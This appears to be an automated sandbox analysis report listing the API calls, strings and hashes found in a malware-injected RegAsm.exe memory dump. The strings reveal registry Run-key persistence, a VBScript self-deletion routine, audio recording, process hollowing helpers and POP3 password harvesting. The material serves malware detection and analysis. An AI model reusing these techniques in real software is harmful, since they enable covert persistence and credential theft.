                                                                                  • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                  APIs
                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6BAD8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                  • API String ID: 3797177996-2483056239
                                                                                  • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                  • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                  APIs
                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                  • API String ID: 2649220323-436679193
                                                                                  • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                  • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                  • API String ID: 738084811-2094122233
                                                                                  • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                  • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Write$Create
                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                  • API String ID: 1602526932-4212202414
                                                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                  • API String ID: 1646373207-255920310
                                                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                  APIs
                                                                                    • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                    • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                    • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                  • _strlen.LIBCMT ref: 10001855
                                                                                  • _strlen.LIBCMT ref: 10001869
                                                                                  • _strlen.LIBCMT ref: 1000188B
                                                                                  • _strlen.LIBCMT ref: 100018AE
                                                                                  • _strlen.LIBCMT ref: 100018C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$File$CopyCreateDelete
                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                  • API String ID: 3296212668-3023110444
                                                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                  • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                  • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                  • _wcslen.LIBCMT ref: 0040D001
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                  • API String ID: 1579085052-2309681474
                                                                                  • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                  • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                  • String ID: ?
                                                                                  • API String ID: 3941738427-1684325040
                                                                                  • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                  • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen
                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                  • API String ID: 4218353326-230879103
                                                                                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                  • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                  • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                                                  • String ID:
                                                                                  • API String ID: 3899193279-0
                                                                                  • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                  • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                  APIs
                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                  • API String ID: 2490988753-744132762
                                                                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEnumOpen
                                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                  • API String ID: 1332880857-3714951968
                                                                                  • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                  • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                  APIs
                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                  • String ID: Close
                                                                                  • API String ID: 1657328048-3535843008
                                                                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$Info
                                                                                  • String ID:
                                                                                  • API String ID: 2509303402-0
